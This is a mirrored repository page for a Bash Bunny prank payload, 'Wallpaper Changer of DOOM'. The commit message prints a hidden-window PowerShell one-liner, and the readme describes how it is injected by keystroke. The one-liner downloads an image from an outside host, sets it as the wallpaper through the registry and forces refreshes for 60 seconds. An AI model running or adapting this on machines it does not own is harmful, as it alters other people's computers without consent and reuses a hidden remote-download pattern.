hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
4e2593beb425eec0a38509ed563bbdbbf64df2c3
bashbunny-payloads/payloads/library/prank/wallpaper-changer-of-doom
History
Rosius Yves 0ee25f8d0d Update payload.txt (#365) 
Some more shortening. Only 183 characters!

powershell -w h "$p=$home+'\b.jpg';iwr h4k.cc/b.jpg -O $p;SP 'HKCU:Control Panel\Desktop' WallPaper $p;1..59|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}"

* Omit http:// from URI
* powershell -w h to start a hidden powershell windows
* set variable $p for later re-use (saves characters)
* Omit -Uri and redundant characters in -Outfile (-O)
 switches
* 1..59|% to create a loop for 60 seconds
* use $home as directory
2019-01-22 23:24:56 -08:00
..
payload.txt
Update payload.txt (#365)
2019-01-22 23:24:56 -08:00
readme.md
Added wallpaper prank payload re: Hak5 episode 2502
2019-01-09 10:58:36 -08:00

readme.md

Wallpaper Changer of DOOM!!!!

Description

Single stage powershell one-liner executes from run dialog. CMD opens a minimized powershell window which downloads b.jpg (change this URL) to c:\windows\temp then sets the registry entry to change the wallpaper, then finally loops over an undocumented USER32.DLL feature for 60 seconds to force a user profile refresh.

STATUS

LED Status
SETUP Setting attack mode
ATACK Injecting keystrokes
Reference in New Issue View Git Blame Copy Permalink